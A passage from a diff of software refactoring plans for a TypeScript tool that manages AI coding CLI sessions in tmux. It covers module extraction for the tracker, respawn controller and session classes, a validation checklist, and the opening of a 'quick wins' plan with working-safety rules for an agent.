||||
- `_savePlanToHistory()` (private)
|
||||
- `_unblockDependentTasks()` (private)
|
||||
- `_checkForCheckpoint()` (private)
|
||||
|
||||
Events emitted (define in new class):
|
||||
- `planInitialized`
|
||||
- `planTaskUpdate`
|
||||
- `taskBlocked`
|
||||
- `taskUnblocked`
|
||||
- `planCheckpoint`
|
||||
|
||||
**Interface with parent**:
|
||||
```typescript
|
||||
export class RalphPlanTracker extends EventEmitter {
|
||||
constructor() { ... }
|
||||
|
||||
// Parent calls this when iteration changes (for checkpoint detection)
|
||||
notifyCycleCount(cycleCount: number): void { ... }
|
||||
|
||||
// Full public API moves here unchanged
|
||||
initializePlanTasks(items: PlanItem[]): void { ... }
|
||||
updatePlanTask(taskId: string, update: { ... }): { ... } | null { ... }
|
||||
// ...etc
|
||||
}
|
||||
```
|
||||
|
||||
**In `RalphTracker`**: Replace plan methods with delegation:
|
||||
```typescript
|
||||
readonly planTracker = new RalphPlanTracker();
|
||||
|
||||
// Forward plan events
|
||||
this.planTracker.on('planInitialized', (...args) => this.emit('planInitialized', ...args));
|
||||
// ...etc
|
||||
|
||||
// In detectLoopStatus(), when cycleCount changes:
|
||||
this.planTracker.notifyCycleCount(this._loopState.cycleCount);
|
||||
```
|
||||
|
||||
### Step 2b: Extract `RalphFixPlanWatcher` (~150 LOC)
|
||||
|
||||
**Extract these**:
|
||||
|
||||
Properties:
|
||||
- `_workingDir: string | null`
|
||||
- `_fixPlanPath: string | null`
|
||||
- `_fixPlanWatcher: FSWatcher | null`
|
||||
- `_fixPlanWatcherErrorHandler`
|
||||
- `_fixPlanReloadDeb`
|
||||
|
||||
Methods:
|
||||
- `setWorkingDir(workingDir)`
|
||||
- `loadFixPlanFromDisk()`
|
||||
- `startWatchingFixPlan()`
|
||||
- `stopWatchingFixPlan()`
|
||||
- `handleFixPlanChange()`
|
||||
- `isFileAuthoritative` getter
|
||||
|
||||
**Interface with parent**:
|
||||
```typescript
|
||||
export class RalphFixPlanWatcher extends EventEmitter {
|
||||
get isFileAuthoritative(): boolean { ... }
|
||||
|
||||
setWorkingDir(workingDir: string): void { ... }
|
||||
stop(): void { ... }
|
||||
}
|
||||
|
||||
// Events:
|
||||
// 'todosLoaded' → (todos: Array<{id, content, status, priority}>) — parent replaces _todos
|
||||
```
|
||||
|
||||
**In `RalphTracker`**:
|
||||
```typescript
|
||||
readonly fixPlanWatcher = new RalphFixPlanWatcher();
|
||||
|
||||
constructor() {
|
||||
this.fixPlanWatcher.on('todosLoaded', (items) => {
|
||||
// Replace _todos with file-based items
|
||||
this._todos.clear();
|
||||
for (const item of items) {
|
||||
this.addOrUpdateTodo(item.id, item.content, item.status, item.priority);
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
// Delegate isFileAuthoritative
|
||||
get isFileAuthoritative(): boolean {
|
||||
return this.fixPlanWatcher.isFileAuthoritative;
|
||||
}
|
||||
```
|
||||
|
||||
### Step 2c: Extract `RalphStallDetector` (~80 LOC)
|
||||
|
||||
**Extract these**:
|
||||
|
||||
Properties:
|
||||
- `_lastIterationChangeTime`
|
||||
- `_lastObservedIteration`
|
||||
- `_iterationStallTimerId`
|
||||
- `_iterationStallWarningMs`
|
||||
- `_iterationStallCriticalMs`
|
||||
- `_iterationStallWarned`
|
||||
|
||||
Methods:
|
||||
- `startIterationStallDetection()`
|
||||
- `stopIterationStallDetection()`
|
||||
- `checkIterationStall()`
|
||||
- `getIterationStallMetrics()`
|
||||
- `configureIterationStallThresholds(warningMs, criticalMs)`
|
||||
|
||||
**Interface with parent**:
|
||||
```typescript
|
||||
export class RalphStallDetector extends EventEmitter {
|
||||
constructor(private cleanup: CleanupManager) { ... }
|
||||
|
||||
start(): void { ... }
|
||||
stop(): void { ... }
|
||||
|
||||
// Parent calls when iteration changes
|
||||
notifyIterationChanged(iteration: number): void {
|
||||
this._lastIterationChangeTime = Date.now();
|
||||
this._lastObservedIteration = iteration;
|
||||
this._iterationStallWarned = false;
|
||||
}
|
||||
|
||||
// Parent calls to check if loop is active
|
||||
setLoopActive(active: boolean): void { ... }
|
||||
|
||||
getIterationStallMetrics(): { ... } { ... }
|
||||
}
|
||||
|
||||
// Events: 'iterationStallWarning', 'iterationStallCritical'
|
||||
```
|
||||
|
||||
### Step 2d: Extract `RalphStatusParser` (~300 LOC)
|
||||
|
||||
**Extract these**:
|
||||
|
||||
Properties:
|
||||
- `_circuitBreaker: CircuitBreakerStatus`
|
||||
- `_statusBlockBuffer: string[]`
|
||||
- `_inStatusBlock: boolean`
|
||||
- `_lastStatusBlock: RalphStatusBlock | null`
|
||||
- `_completionIndicators: number`
|
||||
- `_exitGateMet: boolean`
|
||||
- `_totalFilesModified: number`
|
||||
- `_totalTasksCompleted: number`
|
||||
|
||||
Methods:
|
||||
- `processStatusBlockLine(line)`
|
||||
- `parseStatusBlock(lines)`
|
||||
- `detectCompletionIndicators(line)`
|
||||
- `updateCircuitBreaker(hasProgress, testsStatus, status)`
|
||||
- `resetCircuitBreaker()`
|
||||
- `circuitBreakerStatus` getter
|
||||
- `lastStatusBlock` getter
|
||||
- `cumulativeStats` getter
|
||||
- `exitGateMet` getter
|
||||
|
||||
Regex patterns to move:
|
||||
- `RALPH_STATUS_START_PATTERN` through `RALPH_RECOMMENDATION_PATTERN`
|
||||
- `COMPLETION_INDICATOR_PATTERNS`
|
||||
|
||||
**Interface with parent**:
|
||||
```typescript
|
||||
export class RalphStatusParser extends EventEmitter {
|
||||
processLine(line: string): void { ... } // calls processStatusBlockLine + detectCompletionIndicators
|
||||
|
||||
get circuitBreakerStatus(): CircuitBreakerStatus { ... }
|
||||
get lastStatusBlock(): RalphStatusBlock | null { ... }
|
||||
get exitGateMet(): boolean { ... }
|
||||
get cumulativeStats(): { ... } { ... }
|
||||
|
||||
resetCircuitBreaker(): void { ... }
|
||||
reset(): void { ... }
|
||||
}
|
||||
|
||||
// Events: 'statusBlockDetected', 'circuitBreakerUpdate', 'exitGateMet'
|
||||
```
|
||||
|
||||
**In `RalphTracker.processLine()`**:
|
||||
```typescript
|
||||
// Replace inline status block handling with delegation
|
||||
this.statusParser.processLine(line);
|
||||
```
|
||||
|
||||
### Step 2e: Keep in `ralph-tracker.ts` (~1,800 LOC)
|
||||
|
||||
The core remains tightly coupled and stays together:
|
||||
- Output parsing pipeline (`processTerminalData`, `processCleanData`, `processLine`)
|
||||
- Loop state management (`_loopState`, `detectLoopStatus`, `enable/disable/startLoop/stopLoop`)
|
||||
- Todo management (`_todos`, `detectTodoItems`, `addOrUpdateTodo`, `updateTodoStatus`, `getTodoStats`)
|
||||
- Completion detection (`detectCompletionPhrase`, `handleCompletionPhrase`, `calculateCompletionConfidence`)
|
||||
- All-tasks-complete detection (`detectAllTasksComplete`)
|
||||
- Auto-enable logic (`shouldAutoEnable`)
|
||||
- Lifecycle (`reset`, `fullReset`, `clear`, `restoreState`, `destroy`)
|
||||
- Event debouncing and buffering
|
||||
|
||||
The class coordinates the extracted modules via composition:
|
||||
```typescript
|
||||
export class RalphTracker extends EventEmitter {
|
||||
readonly planTracker = new RalphPlanTracker();
|
||||
readonly fixPlanWatcher = new RalphFixPlanWatcher();
|
||||
readonly stallDetector: RalphStallDetector;
|
||||
readonly statusParser = new RalphStatusParser();
|
||||
|
||||
constructor() {
|
||||
super();
|
||||
this.stallDetector = new RalphStallDetector(this.cleanup);
|
||||
this._wireSubModuleEvents();
|
||||
}
|
||||
|
||||
private _wireSubModuleEvents(): void {
|
||||
// Forward all sub-module events through RalphTracker
|
||||
// so external consumers don't need to know about the split
|
||||
for (const event of ['planInitialized', 'planTaskUpdate', ...]) {
|
||||
this.planTracker.on(event, (...args) => this.emit(event, ...args));
|
||||
}
|
||||
// ...same for statusParser, stallDetector, fixPlanWatcher
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Migration Safety
|
||||
|
||||
- All events continue to be emitted from `RalphTracker` (forwarded from sub-modules)
|
||||
- All public methods stay on `RalphTracker` (delegated to sub-modules)
|
||||
- External consumers (`session.ts`, `case-routes.ts`) see zero API changes
|
||||
- New sub-modules are exposed as `readonly` properties for direct access where needed
|
||||
|
||||
---
|
||||
|
||||
## 3. Split respawn-controller.ts into focused modules
|
||||
|
||||
**Current**: 3,611 lines, single `RespawnController` class with 6 responsibilities.
|
||||
**Risk**: MEDIUM — health scoring and metrics are cleanly decoupled; detection is tightly coupled.
|
||||
|
||||
### Coupling Analysis Summary
|
||||
|
||||
| Module | Coupling | Extractability |
|
||||
|--------|----------|----------------|
|
||||
| Health scoring | NONE | HIGH — pure calculations from metrics |
|
||||
| Cycle metrics | LOW | HIGH — standalone tracking |
|
||||
| Adaptive timing | LOW | HIGH — standalone timing adjustments |
|
||||
| Stuck-state detection | LOW | MEDIUM — needs state + config refs |
|
||||
| Pattern detection utilities | NONE | HIGH — pure functions |
|
||||
| State machine + idle detection + AI checkers | HIGH | LOW — deeply entangled |
|
||||
|
||||
### Target Structure
|
||||
|
||||
```
|
||||
src/
|
||||
├── respawn-controller.ts (~2,200 LOC — state machine, idle detection,
|
||||
│ AI checkers, terminal handling, hook signals,
|
||||
│ auto-accept, step execution)
|
||||
├── respawn-health.ts (~250 LOC — health scoring + recommendations)
|
||||
├── respawn-metrics.ts (~200 LOC — cycle metrics + aggregate stats)
|
||||
├── respawn-adaptive-timing.ts (~100 LOC — adaptive timing with percentile calc)
|
||||
└── respawn-patterns.ts (~50 LOC — terminal pattern detection utilities)
|
||||
```
|
||||
|
||||
### Step 3a: Extract `RespawnPatterns` (~50 LOC)
|
||||
|
||||
**Pure utility functions, zero coupling**.
|
||||
|
||||
Move:
|
||||
- `isCompletionMessage(data): boolean`
|
||||
- `hasWorkingPattern(data, window): boolean`
|
||||
- `extractTokenCount(data): number | null`
|
||||
- `PROMPT_PATTERNS` array
|
||||
- `WORKING_PATTERNS` array
|
||||
|
||||
```typescript
|
||||
// src/respawn-patterns.ts
|
||||
import { TOKEN_PATTERN, SPINNER_PATTERN } from './utils/index.js';
|
||||
|
||||
export const PROMPT_PATTERNS = ['❯', '>', '$', '%', '#'];
|
||||
|
||||
export const WORKING_PATTERNS = [/* 70+ patterns */];
|
||||
|
||||
export function isCompletionMessage(data: string): boolean { ... }
|
||||
export function hasWorkingPattern(data: string, window: string): boolean { ... }
|
||||
export function extractTokenCount(data: string): number | null { ... }
|
||||
```
|
||||
|
||||
**In `RespawnController`**: Import and call:
|
||||
```typescript
|
||||
import { isCompletionMessage, hasWorkingPattern, extractTokenCount } from './respawn-patterns.js';
|
||||
```
|
||||
|
||||
### Step 3b: Extract `RespawnAdaptiveTiming` (~100 LOC)
|
||||
|
||||
**Self-contained timing controller**.
|
||||
|
||||
Move properties:
|
||||
- `timingHistory: TimingHistory`
|
||||
|
||||
Move methods:
|
||||
- `recordTimingData(idleDetectionMs, cycleDurationMs)`
|
||||
- `updateAdaptiveTiming()`
|
||||
- `getTimingHistory()`
|
||||
- `getAdaptiveCompletionConfirmMs()`
|
||||
|
||||
```typescript
|
||||
export class RespawnAdaptiveTiming {
|
||||
private timingHistory: TimingHistory;
|
||||
|
||||
constructor(private config: { adaptiveMinConfirmMs: number; adaptiveMaxConfirmMs: number }) {
|
||||
this.timingHistory = { recentIdleDetectionMs: [], recentCycleDurationMs: [], ... };
|
||||
}
|
||||
|
||||
recordTimingData(idleDetectionMs: number, cycleDurationMs: number): void { ... }
|
||||
getAdaptiveCompletionConfirmMs(): number { ... }
|
||||
getTimingHistory(): TimingHistory { ... }
|
||||
reset(): void { ... }
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3c: Extract `RespawnCycleMetrics` (~200 LOC)
|
||||
|
||||
**Standalone metrics tracker**.
|
||||
|
||||
Move properties:
|
||||
- `currentCycleMetrics`
|
||||
- `recentCycleMetrics[]`
|
||||
- `aggregateMetrics`
|
||||
- `MAX_CYCLE_METRICS_IN_MEMORY`
|
||||
|
||||
Move methods:
|
||||
- `startCycleMetrics(idleReason)`
|
||||
- `recordCycleStep(step)`
|
||||
- `completeCycleMetrics(outcome, errorMessage?)`
|
||||
- `updateAggregateMetrics(metrics)`
|
||||
- `getAggregateMetrics()`
|
||||
- `getRecentCycleMetrics(limit?)`
|
||||
|
||||
```typescript
|
||||
export class RespawnCycleMetricsTracker {
|
||||
private currentCycleMetrics: Partial<RespawnCycleMetrics> | null = null;
|
||||
private recentCycleMetrics: RespawnCycleMetrics[] = [];
|
||||
private aggregateMetrics: RespawnAggregateMetrics;
|
||||
|
||||
startCycle(sessionId: string, cycleNumber: number, idleReason: string): void { ... }
|
||||
recordStep(step: string): void { ... }
|
||||
completeCycle(outcome: CycleOutcome, errorMessage?: string): RespawnCycleMetrics | null { ... }
|
||||
getAggregate(): RespawnAggregateMetrics { ... }
|
||||
getRecent(limit?: number): RespawnCycleMetrics[] { ... }
|
||||
reset(): void { ... }
|
||||
}
|
||||
```
|
||||
|
||||
**Callback**: `completeCycle()` returns the completed metrics so the controller can pass them to `adaptiveTiming.recordTimingData()`.
|
||||
|
||||
### Step 3d: Extract `RespawnHealthCalculator` (~250 LOC)
|
||||
|
||||
**Pure calculation — no state of its own**.
|
||||
|
||||
Move methods:
|
||||
- `calculateHealthScore()`
|
||||
- `calculateCycleSuccessScore()`
|
||||
- `calculateCircuitBreakerScore()`
|
||||
- `calculateIterationProgressScore()`
|
||||
- `calculateAiCheckerScore()`
|
||||
- `calculateStuckRecoveryScore()`
|
||||
- `generateHealthRecommendations(components)`
|
||||
- `generateHealthSummary(score, status, components)`
|
||||
- `shouldSkipClear()` (belongs here since it's a pure calculation on token/config)
|
||||
|
||||
```typescript
|
||||
export interface HealthInputs {
|
||||
aggregateMetrics: RespawnAggregateMetrics;
|
||||
circuitBreakerStatus: CircuitBreakerStatus;
|
||||
iterationStallMetrics: { stallDurationMs: number; warningMs: number; criticalMs: number } | null;
|
||||
aiCheckerState: { disabled: boolean; inCooldown: boolean; hasErrors: boolean };
|
||||
stuckRecoveryCount: number;
|
||||
maxStuckRecoveries: number;
|
||||
}
|
||||
|
||||
export function calculateHealthScore(inputs: HealthInputs): RalphLoopHealthScore { ... }
|
||||
|
||||
export function shouldSkipClear(
|
||||
lastTokenCount: number,
|
||||
skipClearThresholdPercent: number,
|
||||
maxContextTokens: number
|
||||
): boolean { ... }
|
||||
```
|
||||
|
||||
**Made as pure functions** (not a class) since they hold no state.
|
||||
|
||||
### Step 3e: Keep in `respawn-controller.ts` (~2,200 LOC)
|
||||
|
||||
The core state machine, idle detection, and AI checker integration stays:
|
||||
- State machine transitions (`setState`, `start`, `stop`, `pause`, `resume`)
|
||||
- Terminal data handling (`handleTerminalData`)
|
||||
- All 5 idle detection layers + hook signals
|
||||
- AI checker integration (`tryStartAiCheck`, `startAiCheck`, `startPlanCheck`)
|
||||
- Auto-accept logic
|
||||
- Step execution (`sendUpdateDocs`, `sendClear`, `sendInit`, `sendKickstart`)
|
||||
- Timer management (`startTrackedTimer`, `cancelTrackedTimer`)
|
||||
- Stuck-state detection and recovery
|
||||
- Action logging
|
||||
|
||||
The class composes extracted modules:
|
||||
```typescript
|
||||
import { RespawnAdaptiveTiming } from './respawn-adaptive-timing.js';
|
||||
import { RespawnCycleMetricsTracker } from './respawn-metrics.js';
|
||||
import { calculateHealthScore, shouldSkipClear } from './respawn-health.js';
|
||||
import { isCompletionMessage, hasWorkingPattern, extractTokenCount } from './respawn-patterns.js';
|
||||
|
||||
export class RespawnController extends EventEmitter {
|
||||
private adaptiveTiming: RespawnAdaptiveTiming;
|
||||
private cycleMetrics: RespawnCycleMetricsTracker;
|
||||
|
||||
calculateHealthScore(): RalphLoopHealthScore {
|
||||
return calculateHealthScore({
|
||||
aggregateMetrics: this.cycleMetrics.getAggregate(),
|
||||
circuitBreakerStatus: this.session.ralphTracker.circuitBreakerStatus,
|
||||
iterationStallMetrics: this.session.ralphTracker.getIterationStallMetrics(),
|
||||
aiCheckerState: { ... },
|
||||
stuckRecoveryCount: this.stuckRecoveryCount,
|
||||
maxStuckRecoveries: this.config.maxStuckRecoveries ?? 3,
|
||||
});
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Split session.ts into focused modules
|
||||
|
||||
**Current**: 2,418 lines, single `Session` class.
|
||||
**Risk**: LOW-MEDIUM — extractable pieces are utility-like with clear boundaries.
|
||||
|
||||
### Coupling Analysis Summary
|
||||
|
||||
| Module | Coupling | Extractability |
|
||||
|--------|----------|----------------|
|
||||
| CLI arg builder | NONE | HIGH — pure functions used at spawn time |
|
||||
| Auto-compact/clear | LOW | HIGH — self-contained automation with config |
|
||||
| Token tracking | LOW | MEDIUM — reads PTY output, writes state |
|
||||
| Task description cache | LOW | HIGH — separate LRU cache |
|
||||
| PTY + mux lifecycle | HIGH | KEEP — core of the class |
|
||||
| Tracker integration | HIGH | KEEP — event forwarding plumbing |
|
||||
|
||||
### Target Structure
|
||||
|
||||
```
|
||||
src/
|
||||
├── session.ts (~1,600 LOC — PTY lifecycle, terminal I/O,
|
||||
│ tracker integration, output processing,
|
||||
│ token tracking, state management)
|
||||
├── session-cli-builder.ts (~250 LOC — Claude/OpenCode CLI arg construction)
|
||||
├── session-auto-ops.ts (~300 LOC — auto-compact, auto-clear automation)
|
||||
└── session-task-cache.ts (~100 LOC — task description LRU cache)
|
||||
```
|
||||
|
||||
### Step 4a: Extract `SessionCliBuilder` (~250 LOC)
|
||||
|
||||
**Pure functions — zero coupling to Session instance**.
|
||||
|
||||
Move:
|
||||
- `buildClaudeArgs()` logic (currently inlined in `startInteractive` and `runPrompt`)
|
||||
- `buildOpenCodeArgs()` logic
|
||||
- Model mapping constants
|
||||
- Claude mode to flag mapping
|
||||
- Environment variable construction
|
||||
|
||||
```typescript
|
||||
// src/session-cli-builder.ts
|
||||
export interface CliBuilderConfig {
|
||||
claudeMode: ClaudeMode;
|
||||
model?: string;
|
||||
workingDir: string;
|
||||
sessionId: string;
|
||||
niceConfig?: NiceConfig;
|
||||
isOpenCode?: boolean;
|
||||
openCodeConfig?: OpenCodeConfig;
|
||||
}
|
||||
|
||||
export function buildInteractiveArgs(config: CliBuilderConfig): string[] { ... }
|
||||
export function buildPromptArgs(config: CliBuilderConfig, prompt: string): string[] { ... }
|
||||
export function buildShellArgs(shell?: string): string[] { ... }
|
||||
export function buildClaudeEnv(config: CliBuilderConfig): Record<string, string> { ... }
|
||||
```
|
||||
|
||||
### Step 4b: Extract `SessionAutoOps` (~300 LOC)
|
||||
|
||||
**Self-contained automation with config-based thresholds**.
|
||||
|
||||
Move properties:
|
||||
- `_autoCompactThreshold`
|
||||
- `_autoClearThreshold`
|
||||
- `_isAutoCompacting`
|
||||
- `_isAutoClearing`
|
||||
- `_autoCompactCount`
|
||||
- `_autoClearCount`
|
||||
- `_lastAutoCompactTime`
|
||||
- `_lastAutoClearTime`
|
||||
|
||||
Move methods:
|
||||
- `checkAutoCompact(tokenCount)`
|
||||
- `performAutoCompact()`
|
||||
- `checkAutoClear(tokenCount)`
|
||||
- `performAutoClear()`
|
||||
- Auto-compact/clear threshold configuration
|
||||
|
||||
```typescript
|
||||
export class SessionAutoOps extends EventEmitter {
|
||||
constructor(
|
||||
private writeCommand: (command: string) => Promise<void>,
|
||||
private getTokenCount: () => number,
|
||||
config: { compactThreshold: number; clearThreshold: number }
|
||||
) { ... }
|
||||
|
||||
/** Called after token count updates. Checks thresholds and triggers if needed. */
|
||||
checkThresholds(tokenCount: number): void { ... }
|
||||
|
||||
updateConfig(config: { compactThreshold?: number; clearThreshold?: number }): void { ... }
|
||||
getStats(): { autoCompactCount: number; autoClearCount: number; ... } { ... }
|
||||
}
|
||||
|
||||
// Events: 'autoCompact', 'autoClear'
|
||||
```
|
||||
|
||||
**In `Session`**: Compose and wire:
|
||||
```typescript
|
||||
private autoOps = new SessionAutoOps(
|
||||
(cmd) => this.writeViaMux(cmd),
|
||||
() => this._state.tokenCount,
|
||||
{ compactThreshold: 110_000, clearThreshold: 140_000 }
|
||||
);
|
||||
```
|
||||
|
||||
### Step 4c: Extract `SessionTaskCache` (~100 LOC)
|
||||
|
||||
**Isolated LRU cache for task descriptions**.
|
||||
|
||||
Move:
|
||||
- `_taskDescriptionCache: LRUMap<number, { description: string; timestamp: number }>`
|
||||
- `_taskDescriptionMaxAge`
|
||||
- `findTaskDescriptionNear(lineNumber)`
|
||||
- `cacheTaskDescription(lineNumber, description)`
|
||||
|
||||
```typescript
|
||||
export class SessionTaskCache {
|
||||
private cache: LRUMap<number, { description: string; timestamp: number }>;
|
||||
private maxAgeMs: number;
|
||||
|
||||
constructor(maxSize: number = 50, maxAgeMs: number = 30_000) { ... }
|
||||
|
||||
find(lineNumber: number, searchRadius: number = 50): string | null { ... }
|
||||
add(lineNumber: number, description: string): void { ... }
|
||||
clear(): void { ... }
|
||||
}
|
||||
```
|
||||
|
||||
### Step 4d: Keep in `session.ts` (~1,600 LOC)
|
||||
|
||||
The core stays together:
|
||||
- PTY process management (`spawn`, `kill`, `resize`, `writeViaMux`)
|
||||
- Data streaming pipeline (PTY → buffer → ANSI strip → JSON parse → events)
|
||||
- Tracker initialization and event forwarding (RalphTracker, BashToolParser, TaskTracker)
|
||||
- Output processing (message extraction, completion detection)
|
||||
- Token tracking (status line parsing)
|
||||
- State management (`toState()`, `updateState()`)
|
||||
- Session lifecycle (`startInteractive`, `startShell`, `runPrompt`)
|
||||
- CLI info detection (version, model, account)
|
||||
|
||||
---
|
||||
|
||||
## 5. Execution Order & Dependencies
|
||||
|
||||
Execute in this order to minimize risk. Each step is independently deployable.
|
||||
|
||||
```
|
||||
Step 1: types.ts split
|
||||
↓ (no runtime change, just file reorganization)
|
||||
Step 2a: RalphPlanTracker extraction
|
||||
↓ (independent of types split)
|
||||
Step 2b: RalphFixPlanWatcher extraction
|
||||
Step 2c: RalphStallDetector extraction
|
||||
Step 2d: RalphStatusParser extraction
|
||||
↓ (ralph-tracker.ts now ~1,800 LOC)
|
||||
Step 3a: RespawnPatterns extraction
|
||||
Step 3b: RespawnAdaptiveTiming extraction
|
||||
Step 3c: RespawnCycleMetrics extraction
|
||||
Step 3d: RespawnHealthCalculator extraction
|
||||
↓ (respawn-controller.ts now ~2,200 LOC)
|
||||
Step 4a: SessionCliBuilder extraction
|
||||
Step 4b: SessionAutoOps extraction
|
||||
Step 4c: SessionTaskCache extraction
|
||||
↓ (session.ts now ~1,600 LOC)
|
||||
```
|
||||
|
||||
**Parallelization**: Steps 1, 2a-2d, 3a-3d, and 4a-4c can be done by separate agents in parallel since they touch different files. However, within each group, sequential execution is safer.
|
||||
|
||||
### Risk Mitigation
|
||||
|
||||
- **Barrel exports**: Every split uses delegation + barrel re-export so external consumers see zero API changes
|
||||
- **Event forwarding**: Sub-modules emit events, parent class forwards them — no event contract changes
|
||||
- **Incremental**: Each step can be verified independently with `tsc --noEmit` + `npm run lint`
|
||||
- **No test changes needed**: External API stays identical; existing tests continue to pass
|
||||
|
||||
---
|
||||
|
||||
## 6. Validation Checklist
|
||||
|
||||
After each step, verify:
|
||||
|
||||
- [ ] `tsc --noEmit` passes (no type errors)
|
||||
- [ ] `npm run lint` passes (no unused imports, etc.)
|
||||
- [ ] `npm run format:check` passes
|
||||
- [ ] `npx vitest run test/respawn-controller.test.ts` passes (for respawn splits)
|
||||
- [ ] `npx vitest run test/ralph-tracker.test.ts` passes (for ralph splits)
|
||||
- [ ] `npx vitest run test/session-manager.test.ts` passes (for session splits)
|
||||
- [ ] Dev server starts: `npx tsx src/index.ts web`
|
||||
- [ ] Existing sessions work (create, interact, delete)
|
||||
- [ ] Respawn cycle works (enable respawn, verify idle detection fires)
|
||||
- [ ] No new circular dependencies: `npx madge --circular src/`
|
||||
|
||||
### Size Targets
|
||||
|
||||
| File | Before | After |
|
||||
|------|--------|-------|
|
||||
| `src/types.ts` | 1,443 LOC | 1 LOC (re-export barrel) |
|
||||
| `src/ralph-tracker.ts` | 3,868 LOC | ~1,800 LOC |
|
||||
| `src/respawn-controller.ts` | 3,611 LOC | ~2,200 LOC |
|
||||
| `src/session.ts` | 2,418 LOC | ~1,600 LOC |
|
||||
| **Total new files** | — | 12 files |
|
||||
| **Net LOC change** | — | ~0 (refactor only) |
|
||||
@@ -1,738 +0,0 @@
|
||||
# Phase 1 Implementation Plan: Quick Wins
|
||||
|
||||
**Source**: `docs/code-structure-findings.md` (Phase 1 - Quick Wins section)
|
||||
**Estimated effort**: 1-2 days
|
||||
**Tasks**: 5 independent tasks (can be done in parallel unless noted)
|
||||
|
||||
---
|
||||
|
||||
## Safety Constraints
|
||||
|
||||
Before starting ANY work, read and follow these rules:
|
||||
|
||||
1. **Never run `npx vitest run`** (full suite) -- it kills tmux sessions. You are running inside a Codeman-managed tmux session.
|
||||
2. **Run individual tests only**: `npx vitest run test/<file>.test.ts`
|
||||
3. **Never test on port 3000** -- the live dev server runs there. Tests use ports 3150+.
|
||||
4. **After TypeScript changes**: Run `tsc --noEmit` to verify type checking passes.
|
||||
5. **Before considering done**: Run `npm run lint` and `npm run format:check` to ensure CI passes.
|
||||
6. **Never kill tmux sessions** -- check `echo $CODEMAN_MUX` first.
|
||||
|
||||
---
|
||||
|
||||
## Task Dependencies
|
||||
|
||||
All 5 tasks are independent and can be done in parallel. However:
|
||||
- Task 1 (barrel exports) is a prerequisite if you want to update import sites to use the barrel after Task 3 (consolidate EXEC_TIMEOUT_MS). The EXEC_TIMEOUT_MS consolidation creates a new export that should be added to the barrel.
|
||||
- Task 2 (delete dead functions) removes functions that Task 1 would otherwise need to add to the barrel. Do Task 2 first or simultaneously with Task 1 to avoid adding exports for dead code.
|
||||
|
||||
**Recommended order**: Task 2 -> Task 1 -> Task 3 -> Task 4 -> Task 5
|
||||
|
||||
---
|
||||
|
||||
## Task 1: Export Missing Functions from Utils Barrel
|
||||
|
||||
**File**: `src/utils/index.ts`
|
||||
**Time**: ~30 minutes
|
||||
|
||||
### Problem
|
||||
|
||||
The barrel file (`src/utils/index.ts`) is missing exports for several functions that are defined in util modules, forcing consumers to use deep imports or preventing usage entirely.
|
||||
|
||||
### Missing Exports
|
||||
|
||||
From `src/utils/regex-patterns.ts`:
|
||||
- `createAnsiPatternFull()` -- factory for fresh ANSI regex (documented in CLAUDE.md)
|
||||
- `createAnsiPatternSimple()` -- factory for fresh ANSI regex (documented in CLAUDE.md)
|
||||
- `stripAnsi()` -- ANSI stripping utility
|
||||
- `SAFE_PATH_PATTERN` -- regex for safe file paths (currently deep-imported by `schemas.ts` and `tmux-manager.ts`)
|
||||
|
||||
From `src/utils/token-validation.ts`:
|
||||
- `validateTokenCounts()` -- token count validation (documented in CLAUDE.md)
|
||||
- `validateTokensAndCost()` -- token + cost validation (documented in CLAUDE.md)
|
||||
|
||||
**Note**: Do NOT export `isSimilar`, `isSimilarByDistance`, `levenshteinDistance`, or `normalizePhrase` from `string-similarity.ts` -- these are dead code (see Task 2).
|
||||
|
||||
### Edit 1: Add missing regex-patterns exports
|
||||
|
||||
**File**: `src/utils/index.ts`
|
||||
|
||||
**Old code** (lines 13-18):
|
||||
```typescript
|
||||
export {
|
||||
ANSI_ESCAPE_PATTERN_FULL,
|
||||
ANSI_ESCAPE_PATTERN_SIMPLE,
|
||||
TOKEN_PATTERN,
|
||||
SPINNER_PATTERN,
|
||||
} from './regex-patterns.js';
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
export {
|
||||
ANSI_ESCAPE_PATTERN_FULL,
|
||||
ANSI_ESCAPE_PATTERN_SIMPLE,
|
||||
TOKEN_PATTERN,
|
||||
SPINNER_PATTERN,
|
||||
createAnsiPatternFull,
|
||||
createAnsiPatternSimple,
|
||||
stripAnsi,
|
||||
SAFE_PATH_PATTERN,
|
||||
} from './regex-patterns.js';
|
||||
```
|
||||
|
||||
### Edit 2: Add missing token-validation exports
|
||||
|
||||
**File**: `src/utils/index.ts`
|
||||
|
||||
**Old code** (line 19):
|
||||
```typescript
|
||||
export { MAX_SESSION_TOKENS } from './token-validation.js';
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
export { MAX_SESSION_TOKENS, validateTokenCounts, validateTokensAndCost } from './token-validation.js';
|
||||
```
|
||||
|
||||
### Optional follow-up: Update deep imports to use barrel
|
||||
|
||||
These files currently deep-import `SAFE_PATH_PATTERN` and could be updated to use the barrel instead:
|
||||
|
||||
- `src/web/schemas.ts` line 11: `import { SAFE_PATH_PATTERN } from '../utils/regex-patterns.js';` could become `import { SAFE_PATH_PATTERN } from '../utils/index.js';`
|
||||
- `src/tmux-manager.ts` line 44: `import { SAFE_PATH_PATTERN } from './utils/regex-patterns.js';` could become part of existing barrel import
|
||||
|
||||
This is a low-priority cosmetic change. The barrel export itself is the important fix.
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npm run lint
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 2: Delete Dead Utility Functions
|
||||
|
||||
**File**: `src/utils/string-similarity.ts`
|
||||
**Time**: ~15 minutes
|
||||
|
||||
### Problem
|
||||
|
||||
Four exported functions in `string-similarity.ts` are never imported anywhere in the codebase:
|
||||
- `levenshteinDistance()` (lines 27-69)
|
||||
- `isSimilar()` (lines 106-108)
|
||||
- `isSimilarByDistance()` (lines 123-125)
|
||||
- `normalizePhrase()` (lines 139-144)
|
||||
|
||||
Only three functions are actually used (all by `ralph-tracker.ts` via the barrel):
|
||||
- `stringSimilarity()` -- uses `levenshteinDistance()` internally
|
||||
- `fuzzyPhraseMatch()` -- uses `normalizePhrase()` and `isSimilarByDistance()` internally
|
||||
- `todoContentHash()`
|
||||
|
||||
### Strategy
|
||||
|
||||
